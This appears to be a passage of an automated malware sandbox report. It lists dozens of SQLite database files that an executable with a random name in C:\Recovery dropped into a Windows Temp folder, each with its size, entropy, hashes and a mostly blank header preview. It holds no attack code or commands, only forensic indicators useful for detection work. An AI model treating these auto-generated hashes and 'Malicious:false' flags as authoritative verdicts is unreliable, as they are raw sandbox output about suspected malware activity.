                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\tAKY7KSORd

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\tSlzUDY181

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\tW7tX9gABv

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\tzonNV4ujv

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\u4qlLkYLgv

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\uKTzdcR9EI

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\uMtRxdLvD9

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\uUj7Wp31rl

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\ubHtfFMFBL

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\udyeC0Z1fG

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\uznz9CYzxe

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\v8XAcqV59j

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\vpVZgvSi5Z

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                Category:dropped
                                                                                Size (bytes):28672
                                                                                Entropy (8bit):2.5793180405395284
                                                                                Encrypted:false
                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\wLlp9quqQA

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\wPt4bVYu1N

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\wqqKNQlVIR

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                Category:dropped
                                                                                Size (bytes):28672
                                                                                Entropy (8bit):2.5793180405395284
                                                                                Encrypted:false
                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\wtYSwQjK6L

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                Category:dropped
                                                                                Size (bytes):28672
                                                                                Entropy (8bit):2.5793180405395284
                                                                                Encrypted:false
                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\xAqeaPodiS

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\xkI3bBWUFc

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\y0PkhYH1fM

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\yRGDLBhr2B

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5707520969659783
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\yXn6SbeOYX

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\yrdHGnOxf7

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
